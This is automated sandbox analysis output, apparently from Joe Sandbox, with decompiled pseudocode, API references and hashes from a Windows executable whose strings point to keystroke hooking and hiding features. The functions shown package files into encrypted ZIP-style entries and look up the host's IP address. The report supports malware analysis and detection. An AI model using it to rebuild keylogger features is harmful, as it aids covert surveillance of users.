Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#1200.MFC42(?,00000010,00000000,?,00000000), ref: 004213A8
#800.MFC42(?,00000010,00000000,?,00000000), ref: 004213B4

Strings

EnablePreHandle, xrefs: 0042131E
4!D, xrefs: 00421274
DLL_GetProjectVersion, xrefs: 00421303
EnableSpecialKeysLogging, xrefs: 004212E8
SetHook, xrefs: 004212D2
EnableAltInterception, xrefs: 0042136B
EnableDiaryTracking, xrefs: 00421354
EnableNTInvisible, xrefs: 00421339

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: AddressProc$Loadlstrlen$#1168#1200#537#800FileH_prologLibraryModuleNameStringlstrcat
String ID: 4!D$DLL_GetProjectVersion$EnableAltInterception$EnableDiaryTracking$EnableNTInvisible$EnablePreHandle$EnableSpecialKeysLogging$SetHook
API String ID: 1914841584-874115391
Opcode ID: 5f324d8e9e07d7d23e767c23ccbe8ac709c079e985301b7483cab48d8b03b106
Instruction ID: bc6f9c26e2b2dca5dba9f5e875722a2fec720e5f9551365c77f5d9aac5bb0a88
Opcode Fuzzy Hash: 5f324d8e9e07d7d23e767c23ccbe8ac709c079e985301b7483cab48d8b03b106
Instruction Fuzzy Hash: 29311271B00B25ABD710CF61ECC5A6AB6B5FB58305F94053BF509D29A1DBB8AC808F58

Uniqueness

Uniqueness Score: -1.00%

Function 00418010, Relevance: 32.0, APIs: 16, Strings: 2, Instructions: 464
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00418010(intOrPtr* __ecx, void* __edx, char* _a4, signed int _a7, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a19) {
				void* _v8;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed char _v25;
				char _v26;
				char _v27;
				char _v28;
				signed char _v32;
				char _v33;
				char _v44;
				void _v56;
				signed char _v60;
				signed char _v64;
				intOrPtr _v72;
				char _v332;
				char _v592;
				signed char _v596;
				void* _v600;
				char* _v604;
				char _v864;
				intOrPtr _v868;
				intOrPtr _v872;
				short _v876;
				short _v878;
				signed short _v880;
				signed char _v884;
				int _v888;
				intOrPtr _v892;
				int _v896;
				intOrPtr _v900;
				signed char _v904;
				signed char _v908;
				unsigned int _v912;
				short _v914;
				signed int _v916;
				short _v918;
				void _v920;
				char _v1180;
				void* __edi;
				void* _t186;
				int _t193;
				short _t198;
				char _t207;
				char _t209;
				char _t214;
				char _t216;
				char _t218;
				char _t221;
				char _t223;
				void* _t231;
				intOrPtr _t232;
				char _t240;
				signed char _t241;
				intOrPtr _t245;
				void* _t251;
				void* _t254;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t274;
				intOrPtr _t285;
				intOrPtr* _t286;
				void* _t287;
				signed int _t288;
				void* _t289;
				void* _t296;
				void* _t297;
				void* _t298;
				void* _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				int _t305;
				signed int _t309;
				signed int _t310;
				void* _t311;
				void* _t329;
				intOrPtr _t340;
				intOrPtr* _t345;
				void* _t346;
				char* _t347;
				short _t348;
				void* _t349;
				intOrPtr* _t353;
				void* _t354;
				void* _t355;
				void* _t356;
				void* _t357;

				_t329 = __edx;
				_t353 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x14)) != 0) {
					return 0x40000;
				}
				if( *((char*)(__ecx + 0x2c)) != 0) {
					return 0x50000;
				}
				_t340 = _a16;
				_v32 = 0;
				if( *__ecx != 0 && _t340 != 4) {
					_v32 = 0xc;
				}
				strcpy( &_v1180, _a4);
				if(_v1180 == 0) {
					L89:
					return 0x10000;
				}
				_t185 =  &_v1180;
				do {
					if( *_t185 == 0x5c) {
						 *_t185 = 0x2f;
					}
					_t185 = _t185 + 1;
				} while ( *_t185 != 0);
				_a19 = _t340 == 4;
				if(_a19 == 0 ||  *((char*)(_t354 + strlen( &_v1180) - 0x499)) == 0x2f) {
					_a7 = _a7 & 0x00000000;
				} else {
					_a7 = 1;
				}
				_v8 = 8;
				if(_a19 != 0) {
					L18:
					_v8 = 0;
				} else {
					_push( &_v1180);
					if(L0041753B( &_v1180, _t329, _t340) != 0) {
						goto L18;
					}
				}
				if(_t340 != 2) {
					if(_t340 != 1) {
						if(_t340 != 3) {
							if(_t340 != 4) {
								goto L89;
							}
							_t186 = L00417D49(_t185, _t329, _t340);
						} else {
							_push(_a12);
							_push(_a8);
							_t186 = L00417C8D(_t185, _t329, _t340);
						}
					} else {
						_push(_a12);
						_push(_a8);
						_t186 = L00417B75(_t185, _t329, _t340);
					}
				} else {
					_push(_a8);
					_t186 = L00417AF4(_t185, _t329, _t340);
				}
				if(_t186 == 0) {
					_v60 = 0;
					strcpy( &_v864, 0x4550cc);
					strcpy( &_v592,  &_v1180);
					_t193 = strlen( &_v592);
					_t356 = _t355 + 0x14;
					_v896 = _t193;
					if(_a7 != 0) {
						strcat( &_v592, "/");
						_v896 = _v896 + 1;
					}
					strcpy( &_v332, 0x4550cc);
					_v596 = 0;
					_v884 = 0;
					_v72 = 1;
					_v64 = 0;
					_v878 = 0;
					_v920 = 0xb17;
					_v918 = 0x14;
					_v912 =  *((intOrPtr*)(_t353 + 0x68));
					_v908 = 0;
					_v916 = 8;
					if( *_t353 != 0 && _a19 == 0) {
						_v916 = 9;
					}
					_v876 = _v916;
					_t198 = _v8;
					_v914 = _t198;
					if(_t198 != 0) {
						L36:
						_v904 = 0;
					} else {
						_t274 =  *((intOrPtr*)(_t353 + 0x70));
						if(_t274 < 0) {
							goto L36;
						} else {
							_v904 = _t274 + _v32;
						}
					}
					_v900 =  *((intOrPtr*)(_t353 + 0x70));
					_v872 =  *((intOrPtr*)(_t353 + 0x4c));
					_v880 = _v880 & 0x00000000;
					_v25 = _v25 & 0x00000000;
					_v868 =  *((intOrPtr*)(_t353 + 0x18)) +  *((intOrPtr*)(_t353 + 0x10));
					_v604 =  &_v28;
					_v600 =  &_v56;
					_v23 =  *((intOrPtr*)(_t353 + 0x58));
					_t296 = 8;
					_v892 = 0x11;
					_v888 = 9;
					_v28 = 0x55;
					_v27 = 0x54;
					_v26 = 0xd;
					_v24 = 7;
					_t207 = E0043E780( *((intOrPtr*)(_t353 + 0x58)), _t296,  *((intOrPtr*)(_t353 + 0x5c)));
					_v22 = _t207;
					_t297 = 0x10;
					_t209 = E0043E780( *((intOrPtr*)(_t353 + 0x58)), _t297,  *((intOrPtr*)(_t353 + 0x5c)));
					_v21 = _t209;
					_t298 = 0x18;
					_v20 = E0043E780( *((intOrPtr*)(_t353 + 0x58)), _t298,  *((intOrPtr*)(_t353 + 0x5c)));
					_v19 =  *((intOrPtr*)(_t353 + 0x50));
					_t299 = 8;
					_t214 = E0043E780( *((intOrPtr*)(_t353 + 0x50)), _t299,  *((intOrPtr*)(_t353 + 0x54)));
					_v18 = _t214;
					_t300 = 0x10;
					_t216 = E0043E780( *((intOrPtr*)(_t353 + 0x50)), _t300,  *((intOrPtr*)(_t353 + 0x54)));
					_v17 = _t216;
					_t301 = 0x18;
					_t218 = E0043E780( *((intOrPtr*)(_t353 + 0x50)), _t301,  *((intOrPtr*)(_t353 + 0x54)));
					_t344 =  *((intOrPtr*)(_t353 + 0x60));
					_t285 =  *((intOrPtr*)(_t353 + 0x64));
					_v16 = _t218;
					_v15 =  *((intOrPtr*)(_t353 + 0x60));
					_t302 = 8;
					_t221 = E0043E780( *((intOrPtr*)(_t353 + 0x60)), _t302, _t285);
					_v14 = _t221;
					_t303 = 0x10;
					_t223 = E0043E780( *((intOrPtr*)(_t353 + 0x60)), _t303, _t285);
					_v13 = _t223;
					_t304 = 0x18;
					_t338 = _t285;
					_v12 = E0043E780( *((intOrPtr*)(_t353 + 0x60)), _t304, _t285);
					_t101 =  &_v28; // 0x55
					memcpy( &_v56, _t101, 9);
					_push(_t353);
					_push(L00417957);
					 *((char*)(_v600 + 2)) = 5;
					_push( &_v920);
					_t231 = L00416B45( &_v920, _t285,  *((intOrPtr*)(_t353 + 0x60)));
					_t357 = _t356 + 0x18;
					if(_t231 != 0) {
						L00417E95(_t231, _t338, _t344);
						L80:
						return 0x400;
					}
					_t232 = _v892;
					_t305 = _v896;
					_t233 = _t232 + _t305 + 0x1e;
					 *((intOrPtr*)(_t353 + 0x18)) =  *((intOrPtr*)(_t353 + 0x18)) + _t232 + _t305 + 0x1e;
					if( *(_t353 + 0x14) != 0) {
						L00417E95(_t233, _t338, _t344);
						return  *(_t353 + 0x14);
					}
					_t345 =  *_t353;
					_t286 = _t353 + 0x30;
					 *_t286 = 0x12345678;
					 *((intOrPtr*)(_t353 + 0x34)) = 0x23456789;
					 *((intOrPtr*)(_t353 + 0x38)) = 0x34567890;
					if(_t345 != 0) {
						while(1) {
							_t269 =  *_t345;
							if(_t269 == 0) {
								goto L44;
							}
							_push(_t269);
							_push(_t286);
							L004174A8(_t269, _t338, _t345);
							_t345 = _t345 + 1;
							if(_t345 != 0) {
								continue;
							}
							goto L44;
						}
					}
					L44:
					if( *0x4553e0 == 0) {
						_t267 = GetDesktopWindow();
						srand(_t267 ^ GetTickCount());
					}
					_t346 = 0;
					do {
						 *((char*)(_t354 + _t346 - 0x28)) = rand() >> 7;
						_t346 = _t346 + 1;
					} while (_t346 < 0xc);
					_v33 = _v912 >> 8;
					_t287 = 0;
					do {
						_t347 = _t354 + _t287 - 0x28;
						_push( *((intOrPtr*)(_t354 + _t287 - 0x28)));
						_push(_t353 + 0x30);
						_t240 = L00417516(_t353 + 0x30, _t338, _t347);
						_t287 = _t287 + 1;
						 *_t347 = _t240;
					} while (_t287 < 0xc);
					_t288 = 0;
					if( *_t353 == 0) {
						L56:
						_t241 = 0;
					} else {
						if(_a19 == 0) {
							_push(0xc);
							_push( &_v44);
							_push(_t353);
							L00417957( &_v44, _t338, _t347);
							_t357 = _t357 + 0xc;
							 *((intOrPtr*)(_t353 + 0x18)) =  *((intOrPtr*)(_t353 + 0x18)) + 0xc;
						}
						if( *_t353 == _t288 || _a19 != 0) {
							goto L56;
						} else {
							_t241 = 1;
						}
					}
					 *(_t353 + 0x2d) = _t241;
					if(_a19 != 0) {
						_t348 = _v8;
						 *(_t353 + 0x90) = _t288;
					} else {
						_t348 = _v8;
						if(_t348 != 8) {
							if(_t348 == 0) {
								_t241 = L00417FB9(_t241, _t338, _t348);
								goto L60;
							}
						} else {
							_push( &_v920);
							_t241 = L00417ED7( &_v920, _t338, _t348);
							L60:
							_t288 = _t241;
						}
					}
					 *(_t353 + 0x2d) =  *(_t353 + 0x2d) & 0x00000000;
					L00417E95(_t241, _t338, _t348);
					_t309 =  *(_t353 + 0x90);
					_t186 =  *(_t353 + 0x14);
					 *((intOrPtr*)(_t353 + 0x18)) =  *((intOrPtr*)(_t353 + 0x18)) + _t309;
					if(_t186 == 0) {
						if(_t288 != 0) {
							goto L80;
						}
						_t339 =  *((intOrPtr*)(_t353 + 0x78));
						_t245 = _v32 + _t309;
						_v908 =  *((intOrPtr*)(_t353 + 0x78));
						_v904 = _t245;
						_t310 = _t309 & 0xffffff00 | _v904 == _t245;
						_v900 =  *((intOrPtr*)(_t353 + 0x70));
						if( *((intOrPtr*)(_t353 + 0x1c)) == _t288 ||  *_t353 != _t288 && _a19 == _t288) {
							if(_v914 != _t348 || _t348 == 0 && _t310 == 0) {
								return 0x4000000;
							}
							_push(_t353);
							_push(L00417957);
							_push( &_v920);
							if(L00416D87( &_v920, _t339, _t348) != 0) {
								goto L80;
							}
							 *((intOrPtr*)(_t353 + 0x18)) =  *((intOrPtr*)(_t353 + 0x18)) + 0x10;
							_v916 = _v876;
						} else {
							_v914 = _t348;
							if((_v916 & 0x00000001) == 0) {
								_v916 = _v916 & 0x0000fff7;
							}
							_v876 = _v916;
							_push(_v868 -  *((intOrPtr*)(_t353 + 0x10)));
							if(L00417A41(_v868 -  *((intOrPtr*)(_t353 + 0x10)), _t339, _t348) == 0) {
								L74:
								return 0x2000000;
							}
							_push(_t353);
							_push(L00417957);
							_push( &_v920);
							if(L00416B45( &_v920, _t339, _t348) != 0) {
								goto L80;
							}
							_push( *((intOrPtr*)(_t353 + 0x18)));
							if(L00417A41(_t262, _t339, _t348) == 0) {
								goto L74;
							}
						}
						_t186 =  *(_t353 + 0x14);
						if(_t186 == 0) {
							_push(_v888);
							L0043DD54();
							_t349 = _t186;
							_t251 = memcpy(_t349, _v600, _v888);
							_v600 = _t349;
							_push(0x360);
							L0043DD54();
							_t289 = _t251;
							memcpy(_t289,  &_v920, 0x360);
							_t254 =  *(_t353 + 0x44);
							if(_t254 != 0) {
								while(1) {
									_t311 =  *(_t254 + 0x35c);
									if(_t311 == 0) {
										break;
									}
									_t254 = _t311;
								}
								 *(_t254 + 0x35c) = _t289;
								L88:
								return 0;
							}
							 *(_t353 + 0x44) = _t289;
							goto L88;
						}
					}
				}
				return _t186;
			}

0x00418010
0x0041801b
0x00418023
0x00000000
0x00418025
0x00418033
0x00000000
0x00418035
0x00418041
0x00418044
0x00418047
0x0041804e
0x0041804e
0x0041805f
0x0041806d
0x00418610
0x00000000
0x00418610
0x00418073
0x00418079
0x0041807c
0x0041807e
0x0041807e
0x00418081
0x00418082
0x0041808a
0x00418092
0x004180b1
0x004180ab
0x004180ab
0x004180ab
0x004180b9
0x004180c0
0x004180d3
0x004180d3
0x004180c2
0x004180c8
0x004180d1
0x00000000
0x00000000
0x004180d1
0x004180d9
0x004180ea
0x004180fe
0x00418112
0x00000000
0x00000000
0x0041811a
0x00418100
0x00418100
0x00418105
0x00418108
0x00418108
0x004180ec
0x004180ec
0x004180f1
0x004180f4
0x004180f4
0x004180db
0x004180db
0x004180e0
0x004180e0
0x00418121
0x00418134
0x00418137
0x0041814a
0x00418156
0x0041815b
0x00418162
0x00418168
0x00418176
0x0041817b
0x00418182
0x0041818b
0x00418196
0x0041819d
0x004181a3
0x004181aa
0x004181ad
0x004181b4
0x004181bd
0x004181c6
0x004181cc
0x004181d2
0x004181db
0x004181e3
0x004181e3
0x004181f3
0x004181fa
0x004181ff
0x00418206
0x0041821c
0x0041821c
0x00418208
0x00418208
0x0041820d
0x00000000
0x0041820f
0x00418214
0x00418214
0x0041820d
0x00418228
0x00418231
0x00418240
0x00418248
0x0041824c
0x00418255
0x0041825e
0x00418269
0x0041826c
0x00418271
0x0041827b
0x00418285
0x00418289
0x0041828d
0x00418291
0x00418295
0x0041829c
0x0041829f
0x004182a4
0x004182ab
0x004182ae
0x004182be
0x004182c6
0x004182c9
0x004182ce
0x004182d5
0x004182d8
0x004182dd
0x004182e4
0x004182e7
0x004182ec
0x004182f1
0x004182f4
0x004182f7
0x004182ff
0x00418302
0x00418307
0x0041830e
0x00418311
0x00418316
0x0041831d
0x00418320
0x00418323
0x0041832a
0x0041832d
0x00418337
0x00418342
0x00418343
0x00418348
0x00418352
0x00418353
0x00418358
0x0041835d
0x00418361
0x00418586
0x00000000
0x00418586
0x0041836b
0x00418371
0x00418377
0x0041837b
0x00418382
0x00418386
0x00000000
0x0041838b
0x00418393
0x00418395
0x0041839a
0x004183a0
0x004183a7
0x004183ae
0x004183b0
0x004183b0
0x004183b4
0x00000000
0x00000000
0x004183b6
0x004183b7
0x004183b8
0x004183be
0x004183c0
0x00000000
0x00000000
0x00000000
0x004183c0
0x004183b0
0x004183c2
0x004183c9
0x004183cb
0x004183dc
0x004183e2
0x004183e3
0x004183e5
0x004183ee
0x004183f2
0x004183f3
0x00418401
0x00418404
0x00418406
0x0041840a
0x0041840e
0x00418412
0x00418413
0x00418418
0x0041841e
0x0041841e
0x00418422
0x00418426
0x0041844f
0x0041844f
0x00418428
0x0041842b
0x00418430
0x00418432
0x00418433
0x00418434
0x00418439
0x0041843c
0x0041843c
0x00418442
0x00000000
0x0041844a
0x0041844c
0x0041844c
0x00418442
0x00418455
0x00418458
0x00418481
0x00418484
0x0041845a
0x0041845a
0x00418460
0x00418476
0x0041847a
0x00000000
0x0041847a
0x00418462
0x0041846a
0x0041846b
0x00418470
0x00418470
0x00418470
0x00418460
0x0041848a
0x00418490
0x00418495
0x0041849b
0x0041849e
0x004184a3
0x004184ab
0x00000000
0x00000000
0x004184b4
0x004184b7
0x004184b9
0x004184c5
0x004184ce
0x004184d4
0x004184da
0x00418559
0x00000000
0x00418563
0x0041856d
0x00418574
0x00418579
0x00418584
0x00000000
0x00000000
0x00418597
0x0041859b
0x004184e5
0x004184ec
0x004184f3
0x004184f5
0x004184f5
0x00418507
0x00418517
0x0041851f
0x00418548
0x00000000
0x00418548
0x00418521
0x00418528
0x0041852d
0x00418538
0x00000000
0x00000000
0x0041853a
0x00418546
0x00000000
0x00000000
0x00418546
0x004185a2
0x004185a7
0x004185a9
0x004185af
0x004185ba
0x004185c3
0x004185c8
0x004185d3
0x004185d4
0x004185d9
0x004185e4
0x004185e9
0x004185f1
0x004185f8
0x004185f8
0x00418600
0x00000000
0x00000000
0x00418602
0x00418602
0x00418606
0x0041860c
0x00000000
0x0041860c
0x004185f3
0x00000000
0x004185f3
0x004185a7
0x004184a3
0x00418619

Strings

UT, xrefs: 0041832D, 00418332
/, xrefs: 004180A0

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: d14897e67feb5de1872cacf77b447b8adee001a6bf3d8b80a78e4a60efebb775
Instruction ID: 6401665bf719d7cef6a65d4832275fd9386a2ffd512360343dbec1cb152a70d1
Opcode Fuzzy Hash: d14897e67feb5de1872cacf77b447b8adee001a6bf3d8b80a78e4a60efebb775
Instruction Fuzzy Hash: 3102F071A043589BDB218F65C8417DFBBB9AF14308F1404AFE489A7242DF789EC9CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042A943, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 122
stringnetworkCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0042A943(CHAR* _a4) {
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				unsigned int _v28;
				char _v128;
				char _v528;
				unsigned int _t43;
				char* _t69;
				CHAR* _t71;
				intOrPtr* _t81;
				void* _t82;

				_push( &_v528);
				_push(0x101);
				L0043E9E2();
				 *_a4 =  *_a4 & 0x00000000;
				_t43 = gethostname( &_v128, 0x64);
				if(_t43 == 0) {
					_t43 = lstrcmpA( &_v128, 0x4550cc);
					if(_t43 != 0) {
						_t43 =  &_v128;
						_push(_t43);
						L0043E9A0();
						_v28 = _t43;
						if(_t43 != 0) {
							_t43 =  *(_t43 + 0xc);
							_v24 = 1;
							if(_t43 != 0) {
								_v16 = _v16 & 0x00000000;
								_t81 = __imp___itoa;
								_t71 = ".";
								while(1) {
									_t43 =  *(_v16 + _t43);
									if(_t43 == 0) {
										goto L10;
									}
									L0043E9DC();
									_v20 = _t43;
									 *_t81(_t43 >> 0x00000018 & 0x000000ff,  &_v12, 0xa,  *_t43);
									lstrcatA(_a4,  &_v12);
									 *_t81(_v20 >> 0x00000010 & 0x000000ff,  &_v12, 0xa);
									lstrcatA(_a4, _t71);
									strcat(_a4,  &_v12);
									 *_t81(_v20 >> 0x00000008 & 0x000000ff,  &_v12, 0xa);
									lstrcatA(_a4, _t71);
									strcat(_a4,  &_v12);
									 *_t81(_v20 & 0x000000ff,  &_v12, 0xa);
									_t82 = _t82 + 0x40;
									lstrcatA(_a4, _t71);
									_t69 = strcat(_a4,  &_v12);
									_v16 = _v16 + 4;
									if(_v24 >= 6) {
										L0043E9D6();
										return _t69;
									}
									_v24 = _v24 + 1;
									_t43 =  *(_v28 + 0xc);
									if(_v16 + _t43 != 0) {
										continue;
									} else {
										return _t43;
									}
									L11:
								}
							}
						}
					}
				}
				L10:
				return _t43;
				goto L11;
			}

0x0042a955
0x0042a956
0x0042a95b
0x0042a965
0x0042a96c
0x0042a973
0x0042a982
0x0042a98a
0x0042a990
0x0042a993
0x0042a994
0x0042a99b
0x0042a99e
0x0042a9a4
0x0042a9a7
0x0042a9b0
0x0042a9b6
0x0042a9ba
0x0042a9c6
0x0042a9cb
0x0042a9ce
0x0042a9d3
0x00000000
0x00000000
0x0042a9db
0x0042a9e0
0x0042a9f0
0x0042a9fc
0x0042aa0e
0x0042aa17
0x0042aa20
0x0042aa35
0x0042aa3e
0x0042aa47
0x0042aa57
0x0042aa59
0x0042aa60
0x0042aa69
0x0042aa6e
0x0042aa78
0x0042aa92
0x00000000
0x0042aa92
0x0042aa80
0x0042aa83
0x0042aa8a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042aa8a
0x0042a9cb
0x0042a9b0
0x0042a99e
0x0042a98a
0x0042aa9b
0x0042aa9b
0x00000000

APIs

WSAStartup.WSOCK32(00000101,?), ref: 0042A95B
gethostname.WSOCK32(?,00000064,00000101,?), ref: 0042A96C
lstrcmpA.KERNEL32(?,004550CC,?,00000064,00000101,?), ref: 0042A982
gethostbyname.WSOCK32(?), ref: 0042A994
htonl.WSOCK32(?,?), ref: 0042A9DB
_itoa.MSVCRT ref: 0042A9F0
lstrcatA.KERNEL32(?,?), ref: 0042A9FC
_itoa.MSVCRT ref: 0042AA0E
lstrcatA.KERNEL32(?,00453F68), ref: 0042AA17
strcat.MSVCRT(?,?), ref: 0042AA20
_itoa.MSVCRT ref: 0042AA35
lstrcatA.KERNEL32(?,00453F68), ref: 0042AA3E
strcat.MSVCRT(?,?), ref: 0042AA47
_itoa.MSVCRT ref: 0042AA57
lstrcatA.KERNEL32(?,00453F68), ref: 0042AA60
strcat.MSVCRT(?,?), ref: 0042AA69
WSACleanup.WSOCK32 ref: 0042AA92

Strings

h?E, xrefs: 0042A9C6

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: _itoalstrcat$strcat$CleanupStartupgethostbynamegethostnamehtonllstrcmp
String ID: h?E
API String ID: 3535020029-3891125417
Opcode ID: 2ade5b4448097ad9d2dacf7f29a1b83ee3970574940c360efec6441c633fba16
Instruction ID: c2f7cf9f2db01428509a8c948451630f9880baa49d6fa6bb967812c5d754f885
Opcode Fuzzy Hash: 2ade5b4448097ad9d2dacf7f29a1b83ee3970574940c360efec6441c633fba16
Instruction Fuzzy Hash: 5B416CB5A0021DABEB10EBA5DC41EFE7BB8EF04305F40446AF901E6191E739DA54CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1F7, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 109
stringCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040E1F7(void* __ecx) {
				struct HFONT__* _t39;
				intOrPtr _t43;
				void* _t45;
				struct HWND__* _t46;
				void* _t71;
				void* _t74;
				void* _t76;

				E0043E4E0(0x4400f8, _t76);
				_t74 = __ecx;
				_push(__ecx);
				L0043E24C();
				 *(_t76 - 4) = 0;
				 *(_t76 - 0x10) = 0;
				_t39 = strcmp( *(__ecx + 0x40), 0x4550cc);
				if(_t39 != 0) {
					_t71 = _t74 + 0x54;
					if(_t71 == 0 ||  *((intOrPtr*)(_t71 + 4)) == 0) {
						_t39 = CreateFontA(0x12, 0, 0, 0, 0x2bc, 0, 0, 0, 1, 0, 0, 0, 0, "Arial");
						_push(_t39);
						L0043DD60();
					}
					if(_t71 != 0 &&  *((intOrPtr*)(_t71 + 4)) != 0) {
						_push(_t71);
						L0043E108();
						 *(_t76 - 0x10) = _t39;
					}
				} else {
					_t46 = GetParent( *(_t74 + 0x20));
					_push(_t46);
					L0043DD9C();
					if(_t46 != 0) {
						_push(E0040CD41(_t46));
						L0043E108();
					}
				}
				L0043DDD8();
				 *(_t76 - 4) = 1;
				L0043E19E();
				L0043E246();
				L0043E024();
				GetClientRect( *(_t74 + 0x20), _t76 - 0x24);
				_t43 =  *((intOrPtr*)(_t76 - 0x14));
				 *(_t76 - 0x24) =  *(_t76 - 0x24) + 5;
				_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x78)) + 0x70))(_t43,  *((intOrPtr*)(_t43 - 8)), _t76 - 0x24, 0x24, 1,  *((intOrPtr*)(_t74 + 0x50)), _t76 - 0x14);
				if( *(_t76 - 0x10) != 0) {
					_push( *(_t76 - 0x10));
					L0043E108();
				}
				 *(_t76 - 4) = 0;
				L0043DD36();
				 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
				L0043E240();
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t45;
			}

0x0040e1fc
0x0040e206
0x0040e209
0x0040e20d
0x0040e21c
0x0040e21f
0x0040e222
0x0040e22b
0x0040e252
0x0040e257
0x0040e276
0x0040e27c
0x0040e27f
0x0040e27f
0x0040e286
0x0040e28d
0x0040e291
0x0040e296
0x0040e296
0x0040e22d
0x0040e230
0x0040e236
0x0040e237
0x0040e23e
0x0040e247
0x0040e24b
0x0040e24b
0x0040e23e
0x0040e29c
0x0040e2a7
0x0040e2ab
0x0040e2b6
0x0040e2c0
0x0040e2cc
0x0040e2d2
0x0040e2d5
0x0040e2ea
